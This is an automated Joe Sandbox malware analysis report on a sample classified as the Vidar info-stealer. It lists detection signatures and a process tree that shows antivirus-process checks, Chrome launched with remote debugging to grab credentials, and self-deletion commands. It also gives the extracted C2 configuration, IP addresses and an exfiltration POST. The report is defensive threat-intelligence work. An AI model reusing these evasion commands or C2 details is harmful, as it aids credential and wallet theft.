Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lem.exe

Overview

General Information

Sample name:lem.exe
Analysis ID:1575515
MD5:27b18a5e8bdaa950af93633a821c2bfa
SHA1:5763fb49a0dcdb77959cf503f008b6f863c1e92d
SHA256:b9c936992c244ab9864cf92bfe3365f7316b306846a4827aa91740da78dee813
Tags:exeHUNuser-smica83
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • lem.exe (PID: 6788 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: 27B18A5E8BDAA950AF93633A821C2BFA)
    • cmd.exe (PID: 6924 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7088 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • findstr.exe (PID: 2256 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1216 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3444 cmdline: cmd /c md 628056 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7080 cmdline: findstr /V "Cleared" Penalties MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2916 cmdline: cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Corrections.com (PID: 5496 cmdline: Corrections.com u MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 4456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 4852 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7052 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 6636 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Corrections.com PID: 5496JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: Corrections.com PID: 5496JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Corrections.com u, ParentImage: C:\Users\user\AppData\Local\Temp\628056\Corrections.com, ParentProcessId: 5496, ParentProcessName: Corrections.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 4456, ProcessName: chrome.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\lem.exe", ParentImage: C:\Users\user\Desktop\lem.exe, ParentProcessId: 6788, ParentProcessName: lem.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ProcessId: 6924, ProcessName: cmd.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6924, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1216, ProcessName: findstr.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-15T20:47:37.153833+010020442471Malware Command and Control Activity Detected116.203.12.241443192.168.2.449743TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-15T20:47:39.457532+010020518311Malware Command and Control Activity Detected116.203.12.241443192.168.2.449744TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-15T20:47:34.861412+010020490871A Network Trojan was detected192.168.2.449742116.203.12.241443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 10.2.Corrections.com.4be0000.2.unpackMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
            Source: lem.exeReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
            Source: lem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.241:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr
            Source: Binary string: cryptosetup.pdb source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0098DC54
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0099A087
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0099A1E2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_0098E472
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_0099A570
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009966DC FindFirstFileW,FindNextFileW,FindClose,10_2_009966DC
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0095C622 FindFirstFileExW,10_2_0095C622
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_009973D4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00997333 FindFirstFileW,FindClose,10_2_00997333
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0098D921
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: chrome.exeMemory has grown: Private usage: 1MB later: 41MB

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 116.203.12.241:443
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.241:443 -> 192.168.2.4:49744
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.241:443 -> 192.168.2.4:49743
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199807592927
            Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewIP Address: 116.203.12.241 116.203.12.241
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
            Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
            Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
            Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
            Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
            Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_0099D889
            Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: chrome.exe, 0000000F.00000003.2122200025.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122519704.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122298245.0000413000F58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: chrome.exe, 0000000F.00000003.2122200025.0000413000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122519704.00004130002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2122298245.0000413000F58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: global trafficDNS traffic detected: DNS query: pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: sedone.online
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7G4WBI5PPH4E3EUS00HDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
            Source: chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
